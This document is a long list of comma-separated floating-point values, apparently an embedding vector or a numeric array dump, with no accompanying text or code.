-0.03546382859349251, -0.038419146090745926, -0.006059207022190094, -0.016390778124332428, -0.009781464003026485, -0.008552758023142815, -0.021522432565689087, 0.0013280865969136357, 0.0035736875142902136, 0.031657248735427856, 0.031689371913671494, -0.006512945052236319, -0.0003443187742959708, -0.0027786423452198505, 0.033697061240673065, -0.016390778124332428, 0.00627603754401207, 0.006569160148501396, -0.022100646048784256, 0.01847074367105961, -0.0076774051412940025, -0.007299959193915129, -0.014591887593269348, 0.00901051051914692, -0.005324392579495907, -0.029778052121400833, -0.023690737783908844, -0.014439303427934647, 0.04603230580687523, 0.012254937551915646, 0.005308331456035376, -0.036491766571998596, -0.0022024353966116905, -0.009596755728125572, -0.019193511456251144, 0.007083128672093153, -0.03951133042573929, 0.008906111121177673, 0.003146049566566944, 0.03252457082271576, -0.017458869144320488, 0.01945049688220024, -0.00019926318782381713, 0.01158035360276699, -0.014487488195300102, -0.024140458554029465, -0.024493813514709473, -0.011010169982910156, 0.006818113848567009, -0.040218036621809006, 0.01619000919163227, 0.008002650924026966, 0.018599236384034157, -0.016703978180885315, 0.031448449939489365, 0.013033920899033546, -0.0048827012069523335, -0.01192567590624094, -0.011459891684353352, -0.0008723411010578275, 0.02104058675467968, -0.02420470491051674, -0.0020217434503138065, 0.007914312183856964, -0.0070670670829713345, -0.004738147370517254, -0.028187962248921394, -0.013347120024263859, 0.00990192499011755, -0.03344007581472397, 0.04118172824382782, -0.011090476997196674, -0.011122600175440311, -0.007737635634839535, 0.020494494587183, 0.016446992754936218, -0.023257076740264893, 0.0244295671582222, 0.010881677269935608, 0.021088771522045135, -0.008343958295881748, 0.02823614701628685, -0.0036158489529043436, 0.008697311393916607, -0.006721744779497385, -0.0008818776695989072, 0.0034211031161248684, -0.0012919482542201877, -0.003720248816534877, -0.035817183554172516, 0.009580695070326328, -0.015957117080688477, -0.01210235245525837, 0.0017547206953167915, 0.018422558903694153, -0.006637421902269125, -0.0017747975653037429, 0.026019657030701637, -0.0036098258569836617, -0.0266781784594059, 0.0043486556969583035, 0.0010861600749194622, -0.03181786462664604, 0.003696156432852149, 0.020317818969488144, -0.0034773184452205896, 0.0032564725261181593, -0.01141170784831047, 0.02338556759059429, 0.0011353484587743878, -0.00041985808638855815, -0.028862545266747475, -0.0036560026928782463, -0.001885220524854958, -0.036299027502536774, 0.022421877831220627, 0.021345755085349083, 0.0089944489300251, -0.015443148091435432, -0.030789926648139954, 0.004858608823269606, -0.02137787826359272, 0.022984029725193977, 0.01744280755519867, 0.0016282362630590796, 0.030018974095582962, -0.01813345216214657, 0.009034602902829647, -0.020960278809070587, 0.0005726934759877622, -0.0035716798156499863, -0.005633576773107052, -0.017731914296746254, -0.024044090881943703, 0.04079625383019447, 0.02958531305193901, 0.0027545501943677664, 0.047991812229156494, 0.02563418075442314, 0.0013983558164909482, 0.01599727012217045, -0.027400948107242584, -0.046417783945798874, -0.016623670235276222, -0.0003533533599693328, 0.015957117080688477, 0.004428963176906109, -0.011572322808206081, 0.00486262422055006, 0.013820935040712357, -0.013033920899033546, -0.010544385761022568, 0.009082787670195103, -0.02091209404170513, 0.004143871366977692, -0.007894235663115978, 0.01220675278455019, 0.017924653366208076, 0.0265496876090765, -0.05130048468708992, 0.0031239648815244436, 0.0055974386632442474, 0.020542679354548454, -0.01395745761692524, -0.024670489132404327, 0.0074525438249111176, -0.02982623688876629, -0.006163606885820627, -0.006263991352170706, 0.007307989988476038, -0.03353644534945488, -0.016687916591763496, 0.029087407514452934, 0.03475712239742279, 0.013877150602638721, -0.01131533831357956, 0.005264162085950375, -0.014824779704213142, -0.008151219226419926, -0.008568818680942059, 0.016591547057032585, -0.01193370670080185, -0.005336438771337271, 0.003830671776086092, 0.001888232072815299, 0.01802102103829384, -0.005224008113145828, -0.024782920256257057, -0.009974202141165733, -0.00398124847561121, -0.010391801595687866, 0.003001495962962508, 0.0002505847660358995, -0.00020390597637742758, -0.011492014862596989, -0.006504914257675409, -0.013869119808077812, -0.026308763772249222, -0.016125762835144997, 0.012776936404407024, -0.013218628242611885, 0.04452252388000488, 0.017121577635407448, 0.021297570317983627, 0.002879026811569929, 0.010953954420983791, -0.009652971290051937, 0.0037804795429110527, 0.004971039481461048, 0.025136273354291916, -0.01697702333331108, -0.024172581732273102, 0.0019625164568424225, -0.0068100830540061, 0.011909614317119122, 0.03184998780488968, 0.004180009476840496, -0.04301274195313454, -0.010054509155452251, -0.030324144288897514, 0.014543703757226467, -0.017169760540127754, -0.028605561703443527, -0.004489193670451641, 0.00193340505938977, -0.01361213531345129, -0.016005301848053932, 0.0069305445067584515, -0.023546183481812477, -0.003200257197022438, 0.0792153999209404, 0.008721403777599335, -0.014142164960503578, 0.0024092274252325296, 0.011050323024392128, -0.01676822267472744, 0.023321321234107018, 0.011066384613513947, 0.019852034747600555, -0.0011243061162531376, 0.036395397037267685, -0.009508417919278145, 0.011877491138875484, -0.0008452372858300805, 0.013114227913320065, 0.02394772134721279, 0.0011353484587743878, -0.004665870685130358, 0.005866468884050846, 0.00526014668866992, -0.007854081690311432, -0.006035114638507366, -0.001369244302622974, 0.000978748663328588, -0.0009707179269753397, 0.025136273354291916, -0.005211961921304464, -0.02868586778640747, 0.01345152035355568, 0.004224178846925497, 0.006958652287721634, -0.02004477195441723, -0.007942420430481434, -0.02293584495782852, 0.021104833111166954, 0.018856219947338104, 0.013596073724329472, -0.003714225720614195, 0.012616321444511414, -0.01766766794025898, 0.017298253253102303, 0.004569501616060734, 0.01069696992635727, 0.04079625383019447, 0.011869460344314575, -0.014744472689926624, -0.017362499609589577, -0.013290905393660069, -0.003810594789683819, 0.004569501616060734, -0.02025357261300087, -0.0018290051957592368, -0.03242820128798485, 0.026405133306980133, -0.01023921649903059, -0.005059377755969763, -0.00666552921757102, -0.008681249804794788, 0.002212473889812827, 0.01721794530749321, -0.02993866614997387, -0.0065651447512209415, 0.0029011114966124296, 0.008914141915738583, 0.008649126626551151, -0.008801710791885853, -0.02990654483437538, -0.01937018893659115, -0.019081082195043564, 0.005011192988604307, 0.02846100740134716, 0.006187699269503355, 0.0037242642138153315, 0.008552758023142815, -0.00016174449410755187, 0.012632383033633232, 0.005641607567667961, -0.04208117350935936, -0.0027545501943677664, -0.03241214156150818, -0.004718070384114981, 0.027031531557440758, 0.01922563463449478, -0.028284329921007156, -0.008255619555711746, 0.013580012135207653, 0.0022706969175487757, -0.0027906885370612144, 0.0028087578248232603, 0.0010871639242395759, 0.008898080326616764, 0.013660320080816746, 0.0029854343738406897, -0.004525332245975733, -0.019595051184296608, 0.025907225906848907, -0.00044796575093641877, -0.007026913575828075, -0.010600601322948933, 0.010094663128256798, -0.016575485467910767, 0.004758224356919527, 0.03723059594631195, 0.02521658129990101, -0.013700474053621292, -0.0038206332828849554, 0.002375096781179309, 0.017266130074858665, -0.016446992754936218, 0.001912324340082705, -0.025730550289154053, -0.032219402492046356, 0.0003794533258769661, -0.0007242740248329937, 0.001867151353508234, -0.009765402413904667, 0.022919783368706703, 0.011034262366592884, 0.01547527126967907, -0.009757371619343758, -0.027063654735684395, -0.0005551261710934341, -0.0027766346465796232, 0.0009350813925266266, 0.03350432217121124, 0.002008693525567651, -0.03149663284420967, -0.02023751102387905, 0.024172581732273102, 0.026501502841711044, 0.0012046137126162648, -0.0023550197947770357, -0.021169079467654228, 0.02271098457276821, 0.017153698951005936, -0.002746519399806857, 0.008054850623011589, 0.004180009476840496, -0.010327555239200592, -0.001956493593752384, -0.03233183175325394, 0.04240240529179573, -0.0037724487483501434, -0.019755665212869644, 0.01394942682236433, -0.033472198992967606, -0.026051780208945274, 0.006007007323205471, 0.012857244350016117, -0.009082787670195103, -0.0046899630688130856, -0.01113866176456213, 0.013395304791629314, -0.015354810282588005, 0.0003656504559330642, -0.006002991925925016, 0.0017336399760097265, -0.0071433596312999725, -0.022116707637906075, -0.010038447566330433, 0.018197698518633842, -0.003228364745154977, 0.04278787970542908, -0.003479326143860817, 0.006039130035787821, 0.0016081593930721283, -0.003138018772006035, -0.05020830035209656, -0.05297088250517845, -0.0017758014146238565, 0.0032805646769702435, 0.0030797957442700863, -0.01175703015178442, 0.011058353818953037, 0.03600991889834404, 0.0011564291780814528, 0.002969372784718871, 0.004139855969697237, 0.0460965521633625, 0.004489193670451641, -0.005838361103087664, 0.016896715387701988, -0.017972836270928383, 0.003605810459703207, 0.01866348274052143, 0.027368824928998947, -0.007448528427630663, 0.010729093104600906, -0.012873305939137936, 0.007825974375009537, -0.005075439345091581, 0.01880803517997265, -0.01501751784235239, 0.00007139846275094897, -0.009203248657286167, -0.018358314409852028, -0.006986759603023529, -0.0016051478451117873, -0.012190691195428371, -0.008103035390377045, -0.024943536147475243, -0.005420761648565531, 0.014294750057160854, -0.01557164080440998, -0.003035626607015729, -0.05126836150884628, 0.01599727012217045, -0.019980527460575104, 0.01663973182439804, -0.0008557777036912739, -0.004858608823269606, -0.01451961137354374, 0.011997953057289124, -0.01371653564274311, 0.02735276333987713, -0.004649809096008539, -0.0021321664098650217, -0.013869119808077812, -0.036748748272657394, -0.02046237140893936, -0.008544727228581905, 0.022566430270671844, -0.002182358643040061, 0.027866730466485023, 0.017169760540127754, -0.0048385318368673325, 0.007717558648437262, -0.012230845168232918, 0.012680567800998688, -0.014077919535338879, 0.030404450371861458, 0.011845368891954422, 0.005701838526874781, -0.0004981579841114581, -0.010777277871966362, -0.0020759510807693005, 0.015748316422104836, -0.01209432166069746, -0.0012377406237646937, -0.0075890664011240005, 0.011508076451718807, 0.00893823429942131, -0.006460744887590408, 0.005521146114915609, -0.024574119597673416, -0.00009793760546017438, 0.029199836775660515, -0.007444513030350208, -0.004013371653854847, -0.011170784942805767, -0.03963982313871384, 0.0014535672962665558, 0.017812222242355347, 0.020735418424010277, 0.0014615979744121432, 0.003830671776086092, -0.017796160653233528, 0.011194877326488495, 0.008705342188477516, -0.005103547126054764, 0.0010409870883449912, -0.010367709212005138, 0.010552416555583477, 0.019498681649565697, -0.018294068053364754, 0.0014575825771316886, -0.019932342693209648, 0.0026461349334567785, -0.011572322808206081, 0.006380437407642603, 0.019546866416931152, 0.019996589049696922, 0.013531827367842197, 0.004521316848695278, -0.025168396532535553, -0.006573175545781851, -0.006882359739392996, -0.010488170199096203, 0.0015690093860030174, 0.0010982061503455043, 0.015676040202379227, 0.0472208596765995, 0.008849895559251308, -0.008448357693850994, 0.043815817683935165, -0.02394772134721279, -0.008191373199224472, -0.03114328160881996, 0.018583174794912338, 0.007424436043947935, -0.005593423265963793, 0.005424777045845985, -0.014278688468039036, 0.005689792335033417, -0.013973519206047058, 0.024702612310647964, 0.009677063673734665, 0.009436140768229961, 0.013812904246151447, -0.005898592062294483, -0.0024152505211532116, 0.002332935342565179, 0.018872281536459923, 0.010994108393788338, -0.03928646817803383, -0.002891073003411293, -0.004766255151480436, -0.02229338511824608, -0.01131533831357956, 0.006235884036868811, -0.006316191516816616, -0.04474738612771034, -0.007942420430481434, 0.0047863321378827095, -0.005689792335033417, -0.007500728126615286, 0.011355492286384106, 0.000525512732565403, -0.009821617044508457, -0.010889708064496517, -0.010745154693722725, -0.006155576091259718, -0.030099282041192055, 0.04069988429546356, -0.0038427177350968122, -0.011186846531927586, -0.011500045657157898, -0.022646738216280937, -0.008440326899290085, 0.00632823770865798, -0.024702612310647964, -0.0035736875142902136, -0.02113695628941059, -0.004139855969697237, -0.025136273354291916, -0.025987533852458, 0.0029553191270679235, -0.017346438020467758, -0.03665238246321678, -0.0038768486119806767, -0.015258440747857094, 0.027400948107242584, -0.017490992322564125, -0.005934730172157288, -0.020414188504219055, 0.0019223627168685198, -0.005721915513277054, 0.003734302707016468, -0.009122941642999649, 0.005055362358689308, -0.02353012189269066, 0.027417009696364403, 0.012150537222623825, 0.00604716083034873, 0.025023842230439186, 0.0071112364530563354, -0.00703092897310853, 0.03947920724749565, 0.013411366380751133, -0.011331399902701378, -0.022855538874864578, 0.014383087866008282, -0.0157161932438612, 0.000025347080736537464, 0.004312517121434212, -0.011556261219084263, 0.007320036180317402, 0.004902777727693319, 0.028958914801478386, -0.005950791761279106, -0.006814098451286554, -0.010126786306500435, -0.016736099496483803, 0.0034632645547389984, 0.006135499570518732, 0.007171466946601868, 0.008745496161282063, -0.01530662551522255, -0.002038808772340417, -0.014479457400739193, -0.01456779520958662, -0.016671855002641678, -0.025377195328474045, -0.00131503667216748, 0.0017195860855281353, 0.015202225185930729, -0.002927211346104741, -0.015459209680557251, 0.004053525160998106, -0.023995906114578247, -0.007866127416491508, -0.0023670659866183996, -0.02577873505651951, 0.01620607078075409, -0.004099701996892691, 0.032026663422584534, 0.03748758137226105, -0.027882792055606842, -0.02487928979098797, -0.00332071864977479, 0.006002991925925016, -0.026919102296233177, -0.01272072084248066, 0.013379243202507496, -0.009861771017313004, 0.016310470178723335, 0.003672064282000065, -0.010199063457548618, 0.021217264235019684, -0.008713372983038425, 0.03271730989217758, 0.008090988732874393, 0.005537207704037428, -0.010134817101061344, -0.03070962056517601, 0.004999147262424231, 0.018406497314572334, 0.031673312187194824, -0.0033468184992671013, 0.020751480013132095, 0.006316191516816616, -0.004553440026938915, -0.004537378437817097, -0.0023530120961368084, 0.008351989090442657, -0.01630243845283985, -0.006187699269503355, -0.0014716364676132798, -0.020896032452583313, 0.012319182977080345, -0.00006258345092646778, 0.019835973158478737, 0.01723400689661503, 0.0041679637506604195, 0.02484716661274433, 0.04278787970542908, 0.014872964471578598, -0.018486805260181427, 0.004625716712325811, -0.005577361676841974, 0.012768905609846115, -0.0007448528194800019, -0.005059377755969763, 0.02589116431772709, -0.008183342404663563, -0.026164211332798004, 0.010094663128256798, 0.025136273354291916, -0.021522432565689087, -0.009211279451847076, 0.046867504715919495, 0.013917304575443268, 0.02060692571103573, -0.006123453378677368, -0.0005235050339251757, 0.0018059167778119445, 0.0071674520149827, 0.01068090833723545, 0.007813927717506886, 0.024702612310647964, -0.003521487582474947, 0.003977233078330755, 0.008078943006694317, -0.008127127774059772, 0.011010169982910156, -0.006223837845027447, 0.008303804323077202, -0.0031179420184344053, 0.007946435362100601, 0.005079454742372036, 0.00961281731724739, -0.011604445986449718, 0.007942420430481434, -0.0024754812475293875, 0.0044209323823452, 0.011026231572031975, 0.004013371653854847, -0.0069184983149170876, 0.009379926137626171, -0.008095004595816135, 0.0008633065153844655, 0.019322004169225693, -0.009339772164821625, -0.008817772381007671, 0.004963008686900139, 0.012993766926229, -0.015113887377083302, -0.009548571892082691, 0.018840158358216286, 0.016912776976823807, -0.00152484024874866, 0.010223154909908772, -0.005272192880511284, 0.021442124620079994, -0.010761216282844543, 0.0023168737534433603, 0.01378881186246872, 0.03408253937959671, 0.014246565289795399, 0.0011654638219624758, -0.014487488195300102, -0.021763354539871216, -0.0023369507398456335, -0.013058013282716274, 0.011845368891954422, 0.001287932856939733, -0.009476294741034508, 0.02982623688876629, 0.001570013235323131, -0.01238342933356762, 0.003629902843385935, -0.00548902340233326, 0.0012317175278440118, 0.01079333946108818, 0.0022225123830139637, 0.0015087786596268415, -0.009090818464756012, -0.00031169381691142917, -0.002314866054803133, -0.004384793806821108, -0.003776464145630598, 0.0008517623064108193, 0.007412389852106571, -0.038419146090745926, -0.0044771479442715645, 0.030870234593749046, 0.01978778839111328, -0.003836694872006774, -0.0002996476832777262, -0.024011967703700066, -0.000690645189024508, -0.002284750808030367, -0.01697702333331108, -0.01518616359680891, -0.014495518989861012, 0.012728751637041569, 0.0020347933750599623, 0.001609163242392242, 0.0024192659184336662, 0.030966604128479958, -0.0051918854005634785, 0.0070670670829713345, -0.00539666973054409, 0.02520051971077919, -0.018149513751268387, -0.00003262495738454163, 0.013668350875377655, -0.027625808492302895, -0.00973327923566103, 0.019305942580103874, -0.008520634844899178, -0.016960961744189262, -0.007938404567539692, -0.009058695286512375, -0.012752844020724297, -0.008191373199224472, -0.014591887593269348, -0.014487488195300102, -0.024477751925587654, -0.007071082480251789, -0.007107221055775881, 0.008416234515607357, 0.024798981845378876, -0.0018460705177858472, -0.0010530331637710333, 0.015676040202379227, 0.0010143851395696402, -0.008568818680942059, 0.0021181125193834305, -0.019273819401860237, 0.02971380576491356, 0.017860407009720802, 0.0012005983153358102, 0.002698334865272045, 0.012592229060828686, -0.00587851507589221, 0.00784203503280878, -0.013531827367842197, 0.0062158070504665375, 0.010809401050209999, 0.02507202699780464, -0.0050192237831652164, -0.01880803517997265, -0.012608290649950504, -0.006713713984936476, 0.003284580074250698, 0.01017497107386589, 0.018502866849303246, -0.021747292950749397, 0.009139003232121468, 0.017587359994649887, 0.01602136343717575, -0.020333880558609962, -0.004045494366437197, -0.006376422010362148, 0.006769929081201553, -0.012335244566202164, -0.01708945445716381, 0.01097804680466652, 0.017266130074858665, 0.0021301587112247944, 0.0051798392087221146, 0.013146351091563702, 0.0006791009800508618, -0.015282533131539822, -0.0023891506716609, 0.007593081798404455, 0.016238193958997726, -0.009540541097521782, -0.00944417156279087, 0.0033608723897486925, 0.02113695628941059, -0.0074645900167524815, -0.027545500546693802, 0.02079966478049755, 0.003914994653314352, -0.018197698518633842, -0.016912776976823807, -0.011403677053749561, -0.008139173500239849, -0.0043486556969583035, -0.009500387124717236, -0.01676822267472744, -0.00556531548500061, 0.023369506001472473, 0.0035556182265281677, 0.004898762796074152, -0.011331399902701378, 0.0008060873369686306, 0.012262968346476555, 0.011508076451718807, -0.00042010904871858656, 0.005420761648565531, 0.010889708064496517, -0.008066896349191666, 0.006376422010362148, -0.007380266673862934, -0.031769681721925735, 0.0003518475859891623, -0.006733790971338749, 0.005023239180445671, -0.011347461491823196, 0.007801881525665522, 0.003539556637406349, -0.007753697223961353, -0.00526014668866992, -0.0037041872274130583, -0.009251433424651623, -0.012768905609846115, 0.03337583318352699, 0.00020817230688408017, 0.0265496876090765, 0.009371895343065262, 0.00013564452819991857, -0.004404870793223381, -0.00990192499011755, -0.002188381738960743, -0.008721403777599335, 0.004057540558278561, -0.0016854554414749146, 0.0026621962897479534, -0.0021462200675159693, 0.022197015583515167, 0.029649559408426285, 0.018647421151399612, 0.006227853242307901, 0.019048959016799927, 0.013314996846020222, 0.005918669048696756, 0.010022385977208614, -0.004288424737751484, -0.0066615138202905655, -0.007745666429400444, -0.011869460344314575, 0.006890390533953905, -0.007364205550402403, 0.003744340967386961, -0.0030396420042961836, -0.005384623538702726, 0.001212644507177174, 0.004009356256574392, 0.008303804323077202, 0.008721403777599335, 0.0008949276525527239, -0.0027023502625524998, -0.006051176227629185, 0.020992401987314224, -0.010456047020852566, 0.007874158211052418, -0.002200427697971463, 0.0012889367062598467, -0.00619171466678381, -0.023578306660056114, 0.001342140487395227, 0.013186505064368248, -0.037873055785894394, -0.005770099814981222, 0.004268348217010498, 0.009644940495491028, 0.008271681144833565, -0.0022325508762151003, 0.010456047020852566, 0.003979240544140339, -0.02450987510383129, 0.0013822942273691297, -0.0008818776695989072, 0.0010550408624112606, -0.022791292518377304, 0.006737806368619204, 0.020317818969488144, -0.003647971898317337, 0.02296796813607216, 0.02158667892217636, 0.006966682616621256, -0.01467219553887844, -0.02060692571103573, -0.023465875536203384, -0.020092956721782684, 0.01733037643134594, 0.013114227913320065, -0.023144645616412163, 0.0019675358198583126, 0.01272072084248066, 0.023481937125325203, -0.01146792247891426, -0.0010911793215200305, 0.01159641519188881, -0.0009571660193614662, 0.0018259936477988958, 0.014318842440843582, 0.013114227913320065, 0.02160274051129818, 0.025473564863204956, -0.01637471653521061, -0.000019104421880911104, -0.0038387025706470013, 0.007392312865704298, 0.006785990670323372, -0.01006253995001316, 0.0071554058231413364, 0.029970789328217506, 0.01766766794025898, 0.005994961131364107, -0.003935071639716625, -0.010664846748113632, 0.016342593356966972, 0.003953140694648027, -0.017908591777086258, -0.02450987510383129, 0.019996589049696922, -0.01220675278455019, 0.0005084474105387926, -0.004436993971467018, -0.008697311393916607, -0.015338748693466187, 0.01146792247891426, -0.013049982488155365, 0.013250751420855522, -0.018840158358216286, -0.008432296104729176, 0.012487828731536865, 0.010456047020852566, -0.03265306353569031, 0.012600259855389595, -0.008360018953680992, -0.01069696992635727, -0.011636569164693356, -0.01607757806777954, 0.018245883285999298, -0.010030416771769524, 0.0014063864946365356, -0.021683046594262123, 0.02115301787853241, -0.003276549279689789, -0.007320036180317402, -0.0095566026866436, 0.011885521933436394, -0.01450354978442192, 0.012592229060828686, 0.014760533347725868, 0.001843059086240828, -0.014093981124460697, -0.00017353966541122645, -0.0010640755062922835, 0.02308039925992489, 0.004188040271401405, -0.016438962891697884, 0.004589578602463007, 0.0028569423593580723, 0.002860957756638527, -0.02340162917971611, 0.016896715387701988, -0.009155064821243286, 0.005790176801383495, -0.005236054304987192, 0.0025296888779848814, -0.02158667892217636, 0.012407521717250347, 0.019482620060443878, -0.017410684376955032, -0.0020578817930072546, -0.01564391702413559, -0.01733037643134594, -0.00344720296561718, 0.007203590124845505, 0.008536696434020996, 0.0001645050651859492, 0.006251945160329342, 0.012279029004275799, 0.00012064959446433932, 0.017699791118502617, 0.014776594936847687, -0.01641486957669258, -0.004894747398793697, -0.021747292950749397, 0.010046478360891342, -0.015587701462209225, -0.01052832417190075, 0.031785741448402405, -0.00008062128472374752, 0.00973327923566103, -0.02173123136162758, 0.0071554058231413364, -0.001197586883790791, 0.0055974386632442474, 0.014029734767973423, -0.02263067662715912, -0.01186143048107624, -0.009821617044508457, 0.007717558648437262, -0.014768564142286777, 0.003569672117009759, -0.005264162085950375, -0.001500747981481254, -0.01512191817164421, -0.01765160635113716, -0.010705000720918179, -0.022566430270671844, 0.004360701888799667, 0.027529438957571983, -0.0020337896421551704, -0.0022205046843737364, 0.017041269689798355, -0.009436140768229961, -0.0005169800715520978, -0.01317044347524643, -0.00542879244312644, 0.0002505847660358995, -0.011074415408074856, -0.009548571892082691, 0.010014355182647705, 0.013122258707880974, 0.007255790289491415, 0.023546183481812477, -0.0038868871051818132, 0.010809401050209999, 0.011556261219084263, -0.021008463576436043, -0.014013673178851604, -0.009982232935726643, 0.014102011919021606, -0.020430248230695724, 0.006179668474942446, -0.015242379158735275, -0.014864933677017689, 0.01371653564274311, -0.01562785543501377, -0.0035616413224488497, 0.007215636316686869, 0.005665699951350689, -0.019145328551530838, -0.013676381669938564, 0.009644940495491028, -0.022116707637906075, 0.016350623220205307, 0.005493038799613714, -0.002032785676419735, 0.00225262762978673, -0.022245200350880623, -0.004404870793223381, 0.010584539733827114, 0.018486805260181427, -0.01147595327347517, -0.009636909700930119, 0.008777618408203125, -0.0035194798838347197, 0.028412822633981705, 0.0035315260756760836, -0.015394963324069977, -0.041470836848020554, -0.0007388297817669809, 0.012415552511811256, -0.029119528830051422, 0.013764719478785992, 0.01991628110408783, -0.009404017589986324, -0.015170102007687092, -0.012849213555455208, -0.0020699279848486185, 0.008801710791885853, 0.02081572636961937, 0.016687916591763496, 0.004356686491519213, 0.02306433767080307, -0.013796842657029629, 0.012463737279176712, -0.013314996846020222, 0.02394772134721279, -0.029199836775660515, 0.013660320080816746, 0.0018972666002810001, -0.0010901754721999168, 0.0046457936987280846, -0.01901683583855629, 0.010456047020852566, 0.014776594936847687, -0.011829307302832603, 0.003230372443795204, -0.010753185488283634, 0.02274310775101185, 0.012560105882585049, 0.015788471326231956, 0.003284580074250698, 0.004067579284310341, 0.011331399902701378, 0.020896032452583313, 0.009331741370260715, -0.0017677706200629473, -0.012897397391498089, -0.005059377755969763, -0.01757129840552807, 0.01316241268068552, -0.015097825787961483, 0.011628538370132446, -0.030532943084836006, -0.004814439453184605, 0.0004592589975800365, 0.018261944875121117, -0.019193511456251144, -0.014559764415025711, -0.003641948802396655, -0.0004145879065617919, 0.01744280755519867, -0.004706024192273617, 0.004894747398793697, -0.019611110910773277, 0.015009487047791481, -0.001956493593752384, -0.004312517121434212, 0.010825462639331818, 0.01755523681640625, 0.023112522438168526, -0.0071674520149827, -0.028991037979722023, 0.0019163397373631597, 0.008058865554630756, -0.01300179772078991, -0.008440326899290085, 0.008737465366721153, -0.003937079105526209, -0.03228364884853363, -0.007781805004924536, 0.0022084584925323725, 0.016342593356966972, 0.006613329518586397, -0.004188040271401405, -0.013547888956964016, 0.0043044863268733025, -0.009211279451847076, 0.00021331702009774745, -0.00601503811776638, -0.004013371653854847, 0.001791863003745675, -0.019980527460575104, 0.007781805004924536, -0.006729775574058294, -0.009974202141165733, -0.009508417919278145, 0.00037418314605019987, -0.0010163928382098675, -0.013523796573281288, 0.012415552511811256, 0.0021321664098650217, -0.02169910818338394, 0.0049670240841805935, -0.005994961131364107, -0.002110081724822521, -0.0034994028974324465, 0.020060833543539047, -0.005549253895878792, -0.014872964471578598, -0.008906111121177673, 0.007159421220421791, 0.005934730172157288, 0.018085267394781113, 0.02094421721994877, 0.01501751784235239, 0.02214883081614971, -0.009942078962922096, -0.015507394447922707, 0.005593423265963793, -0.020896032452583313, 0.005195900797843933, 0.021522432565689087, 0.002059889491647482, -0.02034994214773178, 0.006448698695749044, 0.01581256277859211, -0.00005684270945494063, -0.007958481088280678, -0.013580012135207653, 0.006785990670323372, 0.0002148227795260027, 0.010472108609974384, 0.004151902161538601, -0.005296285264194012, 0.006990775000303984, 0.01744280755519867, 0.0004133330949116498, 0.009540541097521782, 0.006508929654955864, 0.011628538370132446, 0.010785308666527271, 0.0037784718442708254, -0.02621239423751831, -0.018278006464242935, 0.014864933677017689, -0.0066615138202905655, -0.0065249912440776825, 0.009765402413904667, 0.006649468094110489, 0.0030155498534440994, -0.0042081172578036785, -0.003344810800626874, 0.018374374136328697, 0.014214442111551762, 0.00570986932143569, 0.006516960449516773, 0.006111407186836004, 0.007577020674943924, 0.006376422010362148, 0.010472108609974384, -0.011492014862596989, 0.007046990562230349, -0.009821617044508457, 0.01753917522728443, 0.027176085859537125, 0.01097804680466652, 0.00596283795312047, 0.028525253757834435, -0.0035897488705813885, 0.013347120024263859, 0.003758394857868552, -0.014198380522429943, 0.010616662912070751, -0.00944417156279087, 0.003666041186079383, 0.024172581732273102, -0.019386250525712967, 0.009347802959382534, -0.009227341040968895, 0.0018149514216929674, 0.02698334865272045, -0.0005817280616611242, 0.01174899935722351, -0.004501239862293005, -0.020767541602253914, -0.02115301787853241, -0.01635865494608879, 0.0044329785741865635, 0.0062559605576097965, -0.000978246796876192, -0.017073392868041992, -0.0006831163773313165, 0.0024192659184336662, -0.05538010969758034, 0.027866730466485023, -0.012415552511811256, 0.0009767409646883607, -0.017185822129249573, -0.00526014668866992, -0.009773433208465576, 0.013861089013516903, -0.019948404282331467, 0.013571981340646744, 0.01158035360276699, -0.011652630753815174, 0.008111066184937954, 0.002383127575740218, 0.009122941642999649, -0.013845027424395084, -0.003521487582474947, -0.012262968346476555, -0.00021331702009774745, -0.016310470178723335, -0.028316453099250793, 0.0047783013433218, 0.015041610226035118, 0.014013673178851604, -0.004220163449645042, -0.00040178888593800366, -0.01880803517997265, 0.018294068053364754, 0.006777959875762463, -0.0034873567055910826, -0.013989580795168877, -0.02012507990002632, 0.024349259212613106, 0.0018972666002810001, 0.0075489128939807415, -0.02171516977250576, -0.015411024913191795, 0.016960961744189262, 0.006938575301319361, 0.02642119489610195, -0.0011955791851505637, -0.0002002670371439308, 0.014728411100804806, -0.005561300087720156, 0.0001805665815481916, -0.005693807732313871, 0.0023851352743804455, 0.023112522438168526, 0.007982573471963406, 0.0008452372858300805, 0.01394942682236433, -0.03265306353569031, -0.0072397287003695965, -0.004372748080641031, -0.031191464513540268, -0.010576508939266205, 0.0008929199539124966, -0.024333197623491287, 0.017747975885868073, 0.0003714225604198873, -0.0003867312043439597, 0.006211791653186083, -0.014126104302704334, -0.014150195755064487, 0.0025176426861435175, -0.016005301848053932, 0.013017859309911728, 0.008882018737494946, -0.011098507791757584, -0.007769758813083172, -0.016623670235276222, 0.010287401266396046, -0.005187870003283024, -0.018390435725450516, 0.021313631907105446, -0.012270999141037464, 0.0006735798669978976, 0.020960278809070587, -0.007573005277663469, 0.02057480253279209, 0.015651948750019073, -0.004537378437817097, -0.0027906885370612144, 0.015676040202379227, 0.0027846654411405325, 0.02203640155494213, -0.007187528535723686, -0.004461086355149746, -0.0071433596312999725, -0.020494494587183, -0.007801881525665522, -0.00004140859891776927, 0.0031781725119799376, -0.012696628458797932, -0.000020390596546349116, -0.007966511882841587, 0.012150537222623825, -0.004236225038766861, 0.02046237140893936, -0.010921831242740154, 0.015274502336978912, 0.008335927501320839, -0.01562785543501377, 0.008600941859185696, -0.0012899405555799603, -0.004585563205182552, -0.0050915009342134, 0.0038989330641925335, -0.014615979976952076, 0.007577020674943924, -0.05769296735525131, 0.0047863321378827095, 0.01922563463449478, 0.004264332819730043, -0.0006208780105225742, 0.008729434572160244, 0.02238975465297699, 0.008014696650207043, 0.006095345597714186, 0.01495327241718769, -0.005356515757739544, -0.02023751102387905, -0.00010270586790284142, -0.0002524669689591974, 0.00893823429942131, -0.0022626661229878664, -0.01084955409169197, -0.001330094295553863, 0.006561129353940487, -0.021795477718114853, -0.012246906757354736, -0.017362499609589577, -0.010640754364430904, -0.013812904246151447, -0.03748758137226105, -0.00366804888471961, 0.00773362023755908, -0.018743790686130524, 0.015226317569613457, -0.011492014862596989, -0.0014314826112240553, 0.005380608141422272, -0.0009742313413880765, 0.0074525438249111176, -0.012118414044380188, -0.006007007323205471, -0.021345755085349083, 0.0028689883183687925, 0.0019404320046305656, -0.016671855002641678, -0.019980527460575104, -0.014198380522429943, -0.026646055281162262, 0.014712349511682987, 0.02181153930723667, -0.03191423416137695, -0.023995906114578247, 0.023883474990725517, -0.007119267247617245, -0.018840158358216286, -0.001894255168735981, -0.009580695070326328, 0.0021743278484791517, 0.010191032662987709, -0.004878685809671879, -0.00172360148280859, 0.014816748909652233, 0.006645452696830034, 0.006838190834969282, 